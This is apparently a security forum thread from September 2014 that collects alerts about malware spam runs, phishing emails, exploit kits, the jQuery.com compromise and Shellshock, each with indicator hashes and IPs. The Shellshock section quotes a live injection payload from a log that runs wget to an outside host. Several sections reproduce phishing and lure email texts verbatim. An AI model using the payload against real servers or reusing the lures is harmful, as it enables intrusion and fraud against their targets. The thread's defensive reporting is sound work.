* https://www.virustotal.com/en-gb/file/2008078314022b0bf08cc1e2a23420ec4f7caab95e00e020ecf07b7c01dbfa35/analysis/1411464313/
___
jQuery.com compromised to serve malware via drive-by download
- http://www.net-security.org/malware_news.php?id=2869
23.09.2014 - "jQuery.com, the official website of the popular cross-platform JavaScript library of the same name, had been compromised and had been -redirecting- visitors to a website hosting the RIG exploit kit and, ultimately, delivering information-stealing malware. While any website compromise is dangerous for users, this one is particularly disconcerting because of the demographic of its users... The attack was first detected on September 18, and given that the malicious redirector was hosted on a domain that was registered on the same day, it's more than likely that that was the day when the attack actually started. RiskIQ researchers* have immediately notified the jQuery Foundation about the compromise, and the site's administrators have -removed- the malicious script. The bad news is that they still don't know how the compromised happened, so it just might happen again. Users who have visited the site on or around September 18 are advised to check whether they have been compromised by the malware. The researchers recommend immediately re-imaging of the system, resetting passwords for user accounts that have been used on it, and checking whether suspicious activity has originated from it (data exfiltration, etc.). The only good news in all of this is that there is no indication that the jQuery library was affected."
* http://www.riskiq.com/resources/blog/jquerycom-malware-attack-puts-privileged-enterprise-it-accounts-risk
>> https://blog.malwarebytes.org/?s=RIG+exploit+kit
- https://isc.sans.edu/diary.html?storyid=18699
2014-09-23
46.182.31.77: https://www.virustotal.com/en/ip-address/46.182.31.77/information/
___
Nuclear Exploit Kit evolves, includes Silverlight Exploit
- http://blog.trendmicro.com/trendlabs-security-intelligence/nuclear-exploit-kit-evolves-includes-silverlight-exploit/
Sep 23, 2014 - "... We observed that the Nuclear Exploit Kit exploit kit recently included the Silverlight exploit (CVE-2013-0074*) in its scope. We believe that the attackers behind the Nuclear Exploit Kit included Silverlight in its roster of targeted software for two reasons: to have an expanded attack surface and to avoid detection (as not many security solutions have detections for this particular exploit)... This particular exploit has also been used in other exploit kits, such as the Angler Exploit Kit... Microsoft has released a bulletin (Microsoft Security Bulletin MS13-022) to address the associated vulnerability... The number of exploits used by the kit has -doubled- since the start of 2014...
Timeline of exploits used by the Nuclear Exploit Kit:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/2-Nuclear-Exploit-Kit-Timeline-01.jpg
Vulnerabilities targeted by the current Nuclear Exploit Kit:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2014/09/nuclearexploit_fig4.png
... patches have already been released for the vulnerabilities targeted by the Nuclear Exploit Kit..."
* https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0074 - 9.3 (HIGH)
:mad: :fear::fear:
AplusWebMaster
2014-09-24, 13:25
FYI...
Fake BankLine SPAM
- http://blog.dynamoo.com/2014/09/you-have-received-new-secure-message.html
24 Sep 2014 - "This -fake- BankLine email leads to malware that is not currently detected by any anti-virus engine:
From: Bankline [secure.message@ bankline .com]
Date: 24 September 2014 09:59
Subject: You have received a new secure message from BankLine
You have received a secure message.
Read your secure message by following the link bellow ...
You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk ...
First time users - will need to register after opening the attachment...
The link in the email goes to ismashahalam .net/xyzpayohjx/ngkzoeqjjs.html which downloads an archive file from ismashahalam .net/xyzpayohjx/SecureMessage.zip. This in turn contains a malicious file SecureMessage.scr which has a VirusTotal detection rate of 0/50*. The Anubis report** shows that the malware phones home to very-english .co.uk which is worth blocking or monitoring."
* https://www.virustotal.com/en-gb/file/2ae91a34c322641a86239ab97ba8995e0e188d67ebd5e472825e53d7b53585eb/analysis/1411546325/
** https://anubis.iseclab.org/?action=result&task_id=1d5af02378c37a5b47d2e9524c46863ef&format=html
- http://myonlinesecurity.co.uk/received-new-secure-message-bankline-fake-pdf-malware/
24 Sep 2014 - "... 24 Sep 2014: SecureMessage.zip: Extracts to: SecureMessage.scr
Current Virus total detections: 7/54*..."
* https://www.virustotal.com/en/file/2ae91a34c322641a86239ab97ba8995e0e188d67ebd5e472825e53d7b53585eb/analysis/1411565004/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake Voice mail SPAM
- http://myonlinesecurity.co.uk/inclarity-net-voice-message-attached-01636605058-name-unavailable-fake-wav-malware/
24 Sep 2014 - "'Voice Message Attached from 01636605058 – name unavailable' pretending to come from voicemail@ inclarity .net is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Time: Sep 23, 2014 10:50:00 AM
Click attachment to listen to Voice Message
24 September 2014: 01636605058_20140919_105000.wav.zip: Extracts to: 01636605058_20140919_105000.wav.exe
Current Virus total detections: 12/53*
This 'Voice Message Attached from 01636605058 – name unavailable' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav ( (sound) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/490f83b60921c80a4666ff9b546ce0a233199949d4a00a6035178fa685debbfb/analysis/1411568872/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake 'overdue invoice' SPAM – malware
- http://myonlinesecurity.co.uk/reminder-overdue-invoice-malware/
24 Sep 2014 - "'Reminder of overdue invoice' pretending to come from a random name at a random company and with a random named attachment is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... different subjects with this one having different numbers including:
Reminder of overdue invoice: 708872110964932
Overdue Payment: 122274492356288
Due Date E-Mail Reminder: 417785972641224
Payment reminder: 461929101577209
Past Due Reminder Letter: 199488661953143
Bills Reminder: 325332051074690
Automatic reminder: 676901889653218
Late payment: 475999033756578
Reminder: 215728756825356
The email looks like:
Hello,
This is Rex from Olympus Industrial. After a review of our records, we have found your account is past due.
Account ID: 5FCDMF9. This notice is a reminder your payment is due.
Regards,
Rex Gloeckler
Olympus Industrial...
24 September 2014: application_708872110964932_5FCDMF9.rar:
Extracts to: application_708872110964932_5FCDMF9.exe
Current Virus total detections: 3/54* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a file with a red £ sign instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/de2012097279e862bde5f4ffc8e649ede75400aa7c2afd6b343998c91657968f/analysis/1411570178/
... Behavioural information
TCP connections
157.56.96.53: https://www.virustotal.com/en/ip-address/157.56.96.53/information/
213.186.33.19: https://www.virustotal.com/en/ip-address/213.186.33.19/information/
95.101.0.97: https://www.virustotal.com/en/ip-address/95.101.0.97/information/
213.186.33.17: https://www.virustotal.com/en/ip-address/213.186.33.17/information/
195.60.214.11: https://www.virustotal.com/en/ip-address/195.60.214.11/information/
___
Fake AMEX Phish - 'Home Depot Security concern'
- http://myonlinesecurity.co.uk/american-express-security-concern-data-breach-home-depot-phishing/
24 Sep 2014 - "We are seeing quite a few American Express phishing attempts trying to get your American Express details. These are very well crafted and look identical to genuine American Express emails. The senders appear to be from American Express until you look carefully at the email headers. Do -not- click -any- links in these emails... Today’s version is the 'American Express – Security concern on Data breach at Home Depot' which is a change to previous versions to attempt to make it more believable and attractive for you to click the link & give your details. They are using the recent Home Depot hack and consequent fraudulent transactions* that are being taken from many victims accounts to scare you into ignoring the usual precautions and get you to give them your details:
* http://www.cnbc.com/id/102027452
Email looks like:
[ AMEX logo ]
Dear Customer:We are writing to you because we need to speak with you regarding a security concern on your account. The Home Depot recently reported that there was unauthorized access to payment data systems at its U.S. stores. American Express has put fraud controls in place and we continue to closely monitor the situation. Our records indicate that you recently used your American Express card on September 19, 2014.
We actively monitor accounts for fraud, and if we see unusual activity which may be fraud, our standard practice is to immediately contact our Card Members. There is no need to call us unless you see suspicious activity on your account.
To ensure the safety of your account , please log on to : ...
Regularly monitor your transactions online at americanexpress .com. If you notice fraudulent transactions, visit our online Inquiry and Dispute Center
Enroll in Account Alerts that notify you via email or text messages about potentially fraudulent activities.
Switch to Paperless Statements that are accessible online through your password-protected account.
Your prompt response regarding this matter is appreciated.
Sincerely,
American Express Identity Protection Team ...
Following the link in this 'American Express – Security concern on Data breach at Home Depot' or other -spoofed- emails takes you to a website that looks -exactly- like the real American Express site. You are then led through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your American Express account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. Please read our How to protect yourselves page** for simple, sensible advice on how to avoid being infected or having your details stolen by this sort of socially engineered malware..."
** http://myonlinesecurity.co.uk/how-to-protect-yourself-and-tighten-security/
- http://threattrack.tumblr.com/post/98321608223/american-express-home-depot-credentials-phish
Sep 24, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/094c409ba72f53cb124310343c3a213b/tumblr_inline_ncf48aKPiQ1r6pupn.png
Tagged: AMEX, American Express, Home Depot, Credentials Phish
___
Netcraft Sep 2014 Web Server Survey
- http://news.netcraft.com/archives/2014/09/24/september-2014-web-server-survey.html
24 Sep 2014 - "In the September 2014 survey we received responses from 1,022,954,603 sites — nearly 31 million more than last month. This is the first time the survey has exceeded a -billion- websites, a milestone achievement that was unimaginable two decades ago. Netcraft's first ever survey was carried out over 19 years ago in August 1995. That survey found only 18,957 sites, although the first significant milestone of one million sites was reached in less than two years, by April 1997..."
___
Viator(dot)com - Data Compromise ...
- https://blog.malwarebytes.org/online-security/2014/09/viator-com-data-compromise-are-you-affected/
Sep 23, 2014 - "You may well be seeing an email appearing in your inbox from Viator .com, a website designed to help you find tours and trips overseas with none of the typical messing about such tasks usually involve. The emails have been sent out because it appears they had a breach* and anything up to 1.4 million customers may have been potentially impacted by the compromise...
* http://www.viator.com/about/media-center/press-releases/pr33251
Sep 19, 2014
... the bad news is that the breach took place a good few weeks ago yet we’re only just hearing about it... there doesn’t appear to have been a massive file posted online yet containing data such as PII related to the compromise... we await more information on this latest high-profile attack."
___
Malvertising campaign - involving DoubleClick and Zedo
- https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/
Sep 18, 2014
Update (09/19/14 9:20 AM PT): It appears that the malicious redirection has stopped. Last activity was detected by our honeypots around midnight last night, and nothing else since then. We are still monitoring the situation and will update here if necessary."
- http://arstechnica.com/security/2014/09/google-stops-malicious-advertising-campaign-that-could-have-reached-millions/
Sep 22 2014
:mad: :fear:
AplusWebMaster
2014-09-25, 15:28
FYI...
Fake Bank transfers/invoice SPAM ...
- http://blog.dynamoo.com/2014/09/malware-spam-rbs-bacs-transfer-sage.html
25 Sep 2014 - "... very aggressive spam run this morning, with at least -four- different email formats pushing the -same- malicious download.
RBS / Riley Crabtree: "BACS Transfer : Remittance for JSAG814GBP"
From: Riley Crabtree [creditdepart@ rbs .co.uk]
Date: 25 September 2014 10:58
Subject: BACS Transfer : Remittance for JSAG814GBP
We have arranged a BACS transfer to your bank for the following amount : 4946.00
Please find details at our secure link ...
Sage Account & Payroll: "Outdated Invoice"
From: Sage Account & Payroll [invoice@ sage .com]
Date: 25 September 2014 10:53
Subject: Outdated Invoice
Sage Account & Payroll
You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link ...
Screenshot: https://1.bp.blogspot.com/-8Mx-CTYIitE/VCPrdXzlOiI/AAAAAAAAFvA/YGCgcp8GX2s/s1600/sage2.png
Lloyds Commercial Bank: "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 25 September 2014 11:36
Subject: Important - Commercial Documents
Important account documents
Reference: C400
Case number: 05363392
Please review BACs documents.
Click link below ...
NatWest Invoice: "Important - New account invoice
From: NatWest Invoice [invoice@ natwest .com]
Date: 25 September 2014 10:28
Subject: Important - New account invoice
Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
To view/download your invoice please click here ...
The links in the emails go to different download locations to make it harder to block... In each case the page then downloads the victim to download file Invoice_09252014.zip from the same directory as the html file. This ZIP file contains a malicious executable Invoice_09252014.scr which currently has a VirusTotal detection rate of 3/54*. The Anubis report shows that it phones home to ukrchina-logistics .com which is probably worth blocking or monitoring access to."
* https://www.virustotal.com/en-gb/file/1397ff56e47b642ff1f4eaaaedc3b84fc5cd7c619b25a894a57dabe62987d84c/analysis/1411638249/
... Behavioural information
DNS requests
ukrchina-logistics .com
TCP connections
188.165.198.52: https://www.virustotal.com/en-gb/ip-address/188.165.198.52/information/
91.196.0.119
- http://threattrack.tumblr.com/post/98386009528/sage-software-invoice-spam
Sep 25, 2014
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/c600697c85ad23d80119101ea06360d0/tumblr_inline_ncglljx1ql1r6pupn.png
Tagged: Sage, Upatre
___
Fake BCA SPAM - PDF malware
- http://myonlinesecurity.co.uk/bca-banking-24-09-14-fake-pdf-malware/
25 Sep 2014 - "'BCA Banking 24.09.14' pretending to come from hallsaccounts <hallsaccounts@ hallsgb .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Accounts Dept
Halls Holdings Ltd
Tel: 01743 450700
Fax: 01743 443759 ...
25 September 2014: BCA Banking 24.09.14.pdf.zip : Extracts to: BCA Banking 24.09.14.pdf.exe
Current Virus total detections: 4/53* . This BCA Banking 24.09.14 is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like an image of a barcode to try to fool you instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/cfd9d4f6fc16e6cf4f5960b5c1b3ad5724f86ec0eefd6e87ab154c4b1e156443/analysis/1411646762/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake voice mail SPAM – wav malware
- http://myonlinesecurity.co.uk/outlook-received-voice-mail-fake-wav-malware/
25 Sep 2014 - "'You have received a voice mail' pretending to come from Microsoft Outlook [no-reply@ Your domain] is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
You received a voice mail : VOICE7838396453.wav (26 KB)
Caller-Id: 7838396453
Message-Id: ID9CME
Email-Id: [redacted]
This e-mail contains a voice message.
Download and extract the attachment to listen the message.
Sent by Microsoft Exchange Server
25 September 2014 VOICE7838396453.zip (56kb): Extracts to: voicemessage.scr
Current Virus total detections: 1/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c97b0291ac92a49293a1c8e5a9145241d2e09f9b53df8c13c70ca33701090773/analysis/1411657167/
... Behavioural information
TCP connections
23.21.52.195: https://www.virustotal.com/en/ip-address/23.21.52.195/information/
95.100.255.137: https://www.virustotal.com/en/ip-address/95.100.255.137/information/
194.150.168.70: https://www.virustotal.com/en/ip-address/194.150.168.70/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake Gov't e-mail SCAM
- https://www.ic3.gov/media/2014/140924.aspx
Sep 24, 2014 - "Cybercriminals posing as Internet Crime Complaint Center (IC3) employees are defrauding the public. The IC3 has received complaints from victims who were receiving e-mails purported to be from the IC3... Victims report that the unsolicited e-mail sender is a representative of the IC3. The e-mails state that a criminal report was filed on the victim’s name and social security number and legal papers are pending. Scammers impersonate an IC3 employee to increase credibility and use threats of legal action to create a sense of urgency. Victims are informed they have one to two days from the date of the complaint to contact the scammers. Failure to respond to the e-mail will result in an arrest warrant issued to the victim. Some victims stated they were provided further details regarding the ‘criminal charges’ to include violations of federal banking regulations, collateral check fraud, and theft deception. Other victims claimed that their address was correct but their social security number was incorrect. Victims that requested additional information from the scammer were instructed to obtain prepaid money cards to avoid legal action. Victims have reported this -scam- in multiple states... If you receive this type of e-mail:
- Resist the pressure to act quickly.
- -Never- wire money based on a telephone request or in an e-mail, especially to an overseas location.
The IC3 -never- charges the public for filing a complaint and will -never- threaten to have them arrested if they do not respond to an e-mail..."
:fear::fear: :mad:
AplusWebMaster
2014-09-26, 14:58
FYI...
Amazon phish ...
- http://myonlinesecurity.co.uk/amazon-account-confirmation-phishing/
26 Sep 2014 - "'Account Confirmation' pretending to come from Amazon .co.uk <auto-confirm@ amazon .co.uk> is a phishing email designed to get your Amazon log in details and then your bank, credit card, address and personal details so they can imitate you and take over your accounts and clean you out...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2014/09/Amazon-Account-Confirmation.png
Following the link in this Amazon Account Confirmation or other spoofed emails takes you to a website that looks -exactly- like the real Amazon.co.uk site. You are then through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Amazon account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them ..."
___
Fake docs, voicemail, fax SPAM ...
- http://blog.dynamoo.com/2014/09/malware-spam-employee-documents.html
26 Sep 2014 - "... different types of spam to increase click through rates and now some tricky tools to prevent analysis of the malware.
Employee Documents - Internal Use
From: victimdomain
Date: 26 September 2014 09:41
Subject: Employee Documents - Internal Use
DOCUMENT NOTIFICATION, Powered by NetDocuments
DOCUMENT NAME: Employee Documents ...
Documents are encrypted in transit and store in a secure repository...
You have a new voice
From: Voice Mail [Voice.Mail@ victimdomain]
Date: 26 September 2014 09:30
Subject: You have a new voice
You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
* The reference number for this message is _qvs4004011004_001
The transmission length was 26
Receiving machine ID : ES7D-ZNA1D-QF3E
To download and listen your voice mail please follow the link ...
RBS: BACS Transfer : Remittance for JSAG244GBP
From: Douglas Byers [creditdepart@ rbs .co.uk]
Date: 26 September 2014 10:12
Subject: BACS Transfer : Remittance for JSAG244GBP
We have arranged a BACS transfer to your bank for the following amount : 4596.00
Please find details at our secure link ...
New Fax
From: FAX Message [fax@victimdomain]
Date: 26 September 2014 10:26
Subject: New Fax
You have received a new fax .
Date/Time: Fri, 26 Sep 2014 16:26:36 +0700.
Your Fax message can be downloaded here ...
... The attack has evolved recently.. usually these malicious links forwarded on to another site which had the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload is spread around many different sites making it harder to block. A new one today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given one less hook for AV engines to find.. malicious binary document7698124-86421_pdf.scr is downloaded from the remote site which has a VirusTotal detection rate of 2/55*. The Anubis report shows the malware attempting to phone home to padav .com which is probably worth blocking."
* https://www.virustotal.com/en-gb/file/9819d4027893bcb20cdefc49632008e71672fb3eaefbbb0ef1b626a52dd6c6c4/analysis/1411724904/
... Behavioural information
DNS requests
padav .com (184.106.55.51)
TCP connections
188.165.198.52: https://www.virustotal.com/en-gb/ip-address/188.165.198.52/information/
184.106.55.51: https://www.virustotal.com/en-gb/ip-address/184.106.55.51/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en-gb/ip-address/137.170.185.211/information/
___
Bill.com Spam
- http://threattrack.tumblr.com/post/98466527048/bill-com-spam
Sep 26, 2014 - "Subjects Seen:
Payment Details [Incident: 711935-599632]
Typical e-mail details:
We could not process your Full Payment Submission. The submission for reference ***/UT5236489 was successfully received and was not processed. Check attached copy (PDF Document) for more information.
Regards,
Bill.com Payment Operations
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/8d0ecbce8726c0f09eda8b8e4dbc7c45/tumblr_inline_ncigloYHaW1r6pupn.png
Malicious File Name and MD5:
bill_com_Payment_Details_711935-599632.zip (02EE805D1EACD739BEF4697B26AAC847)
bill_com_payment_details_ID0000012773616632715381235.pdf.exe (AD24CD2E14DCBF199078BDBBAE4BF0CA)
Tagged: bill.com, Vawtrak
___
More Fakes - HMRC, BT, RBS SPAM
- http://blog.dynamoo.com/2014/09/malware-spam-hmrc-taxes-application.html
26 Sep 2014 - "Another bunch of spam emails, with the same payload* at this earlier spam run*.
HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
From: noreply@ taxreg .hmrc .gov.uk [noreply@ taxreg .hmrc .gov.uk]
Date: 26 September 2014 12:26
Subject: HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
Please download/view your HMRC documents here ...
Important - BT Digital File
From: Cory Sylvester [Cory.Sylvester@ bt .com]
Date: 26 September 2014 12:51
Subject: Important - BT Digital File
Dear Customer,
This email contains your BT Digital File. Please scan attached file and reply to this email.
To download your BT Digital File please follow the link ...
RBS Bankline: Outstanding invoice
From: Bankline.Administrator@ rbs .co.uk [Bankline.Administrator@ rbs .co.uk]
To: <REDACTED>
Date: 26 September 2014 13:05
Subject: Outstanding invoice
{_BODY_TXT}
Dear [redacted],
Please find the attached copy invoice which is showing as unpaid on our ledger.
To download your invoice please click here ...
In the sample I looked at the malware page downloaded an archive document26092014-008_pdf.zip which in turn contains document26092014-008_pdf.exe which is the same payload* as earlier..."
* http://blog.dynamoo.com/2014/09/malware-spam-employee-documents.html
___
Fake Barclays SPAM – PDF malware
- http://myonlinesecurity.co.uk/barclays-transaction-complete-fake-pdf-malware/
26 Sep 2014 - "'Barclays Transaction not complete' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Unable to complete your most recent Transaction. Currently your transaction has a pending status.
If the transaction was made by mistake please contact our customer service.
For more details please download payment receipt ...
26 September 2014: PaymentReceipt262.zip: Extracts to: PaymentReceipt262.exe
Current Virus total detections: 2/55* . This 'Barclays Transaction not complete' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/5149eb19e642e141818326b4ad670e9b74496881ea1de69c13786f021efda559/analysis/1411738617/
... Behavioural information
DNS requests
wcdnitaly .org (195.110.124.133)
TCP connections
188.165.198.52: https://www.virustotal.com/en/ip-address/188.165.198.52/information/
195.110.124.133: https://www.virustotal.com/en/ip-address/195.110.124.133/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
:mad: :fear::fear:
AplusWebMaster
2014-09-28, 13:32
FYI...
Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24
- http://blog.dynamoo.com/2014/09/evil-network-shellshock-and-mangohost.html
28 Sep 2014 - "I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday... probing my server at attempting to WGET back to their own network to enumerate vulnerable hosts.
dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http ://ad.dipad .biz/test/http ://dynamoo .com/\""
ad.dipaz .biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range... MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova*. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau. Until the past few days, MangoHost was hosting the -ransomware- sites listed here** [pastebin]. Paste customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode .com, whatever that may be (you can guarantee it is nothing good). Currently hosted domains include a collection of -fake- browser plugins, some -malvertising- sites, some porn, spam sites, hacker resources, -ransomware- domains and what might appear to be some fake Russian law firms... I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it."
(More detail at the dynamoo URL above.)
* https://en.wikipedia.org/wiki/Russians_in_Moldova
** http://pastebin.com/2mC1pXaJ
83.166.234.186: https://www.virustotal.com/en/ip-address/83.166.234.186/information/
83.166.234.133: https://www.virustotal.com/en/ip-address/83.166.234.133/information/
___
Shellshock in the Wild
- http://www.fireeye.com/blog/uncategorized/2014/09/shellshock-in-the-wild.html
Sep 27, 2014 - "... We have observed a significant amount of overtly malicious traffic leveraging BASH, including:
- Malware droppers
- Reverse shells and backdoors
- Data exfiltration
- DDoS
Some of this suspicious activity appears to be originating from Russia. We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise... Exploitation Techniques: The Shellshock traffic we have been able to observe is still quite chaotic. It is largely characterized by high volume automated scans and PoC-like exploit scripts... payload is a very small ELF executable (md5: 959aebc9b44c2a5fdd23330d9be1101e) that was submitted to VirusTotal yesterday with 0 detections. It simply creates a reverse shell, connecting to the same IP the payload was downloaded from: 82.118.242.223... We will continue monitoring the threats and keep you updated..."
(More detail at the fireeye URL above.)
- http://www.symantec.com/connect/blogs/shellshock-all-you-need-know-about-bash-bug-vulnerability
Updated: 29 Sep 2014 - "... Businesses, in particular website owners, are most at risk from this bug and should be aware that its exploitation may allow access to their data and provide attackers with a foothold on their network. Accordingly, it is of critical importance to apply any available patches immediately. Linux vendors have issued security advisories for the newly discovered vulnerability including patching information.
Debian: https://www.debian.org/security/2014/dsa-3032
Ubuntu: http://www.ubuntu.com/usn/usn-2362-1/
Red Hat: https://access.redhat.com/articles/1200223
CentOS: http://centosnow.blogspot.com/2014/09/critical-bash-updates-for-centos-5.html
Novell SUSE: http://support.novell.com/security/cve/CVE-2014-6271.html
*Red Hat has updated its advisory to include fixes for a number of remaining issues.
- https://rhn.redhat.com/errata/RHSA-2014-1306.html
Last updated on: 2014-09-30
If a patch is unavailable for a specific distribution of Linux or Unix, it is recommended that users switch to an alternative shell until one becomes available.
For consumers: Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available.
Symantec Protection: Symantec has created an Intrusion Prevention signature for protection against this vulnerability:
27907 - OS Attack: GNU Bash CVE-2014-6271
> http://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=27907
Symantec will continue to investigate this vulnerability and provide more details as they become available."
:fear::fear: :mad:
AplusWebMaster
2014-09-29, 18:40
FYI...
Fake SITA SPAM - PDF malware
- http://myonlinesecurity.co.uk/sita-uk-remittance-advice-fake-pdf-malware/
29 Sep 2014 - "'Remittance Advice !!!' pretending to come from SITA UK < info @sita .co.uk > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Please find attached folder for remittance advice and your outstanding statement from SITA UK.
Please arrange to send over a credit note as indicated in the statement.
Best Regards,
Luis Shivani,
Financial Controller
SITA UK ...
Update: a slightly revised email coming out now but still the -same- malware attachment
Please find attached folder for remittance advice and your outstanding statement from SITA UK.
Please arrange to send over a credit note as indicated in statement.
Any queries please contact us on 01934-524004.
Best Regards,
Luis Shivani,
Financial Controller
SITA UK ...
29 September 2014: Remittance-Advice.zip: Extracts to: Remittance-Advice.exe
Current Virus total detections: 39/55* . This 'Remittance Advice !!!' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/d8a6c8626cab8f4588254ce0d48460e9968ede774cc7c5b2b756ce4055e39d1d/analysis/1411951945/
... Behavioural information
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake Invoice SPAM - XLS malware
- http://myonlinesecurity.co.uk/invoice-complete-office-solutions-fake-xls-malware/
29 Sep 2014 - "'Your Invoice from Complete Office Solutions' pretending to come from donotreply@ c-o-s .co.uk is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
Hi Please find attached your recent invoices/credits from Complete Office Solutions, if you have any queries please do not hesitate in contacting us on 01904 693696 or email on Julie.edkins@ wallisbusinessservices .co.uk
29 September 2014: A Sales Invoice – By Account_SINV0612471.PDF.zip : Extracts to: A Sales Invoice – By Account_SINV0612471.xls.exe
Current Virus total detections: 25/54* . This 'Your Invoice from Complete Office Solutions' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper excel XLS file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/a7ad4bf44b21ca85233b2eb8f708b196df4226db37406e74b6e791f6f05c75ea/analysis/1411980639/
... Behavioural information
TCP connections
82.165.38.206: https://www.virustotal.com/en/ip-address/82.165.38.206/information/
UDP communications
137.170.185.211: https://www.virustotal.com/en/ip-address/137.170.185.211/information/
___
Fake Bank SPAM - leads to malware
- http://blog.dynamoo.com/2014/09/malware-spam-lloyds-commercial-bank.html
29 Sep 2014 - "Two -different- banking spams this morning, leading to the same malware:
Lloyds Commercial Bank "Important - Commercial Documents"
From: Lloyds Commercial Bank [secure@ lloydsbank .com]
Date: 29 September 2014 11:03
Subject: Important - Commercial Documents
Important account documents
Reference: C947
Case number: 18868193
Please review BACs documents.
Click link below, download and open document. (PDF Adobe file) ...
HSBC Bank UK "Payment Advice Issued"
From: HSBC Bank UK
Date: 29 September 2014 11:42
Subject: Payment Advice Issued
Your payment advice is issued at the request of our customer. The advice is for your reference only.
Please download your payment advice at ...
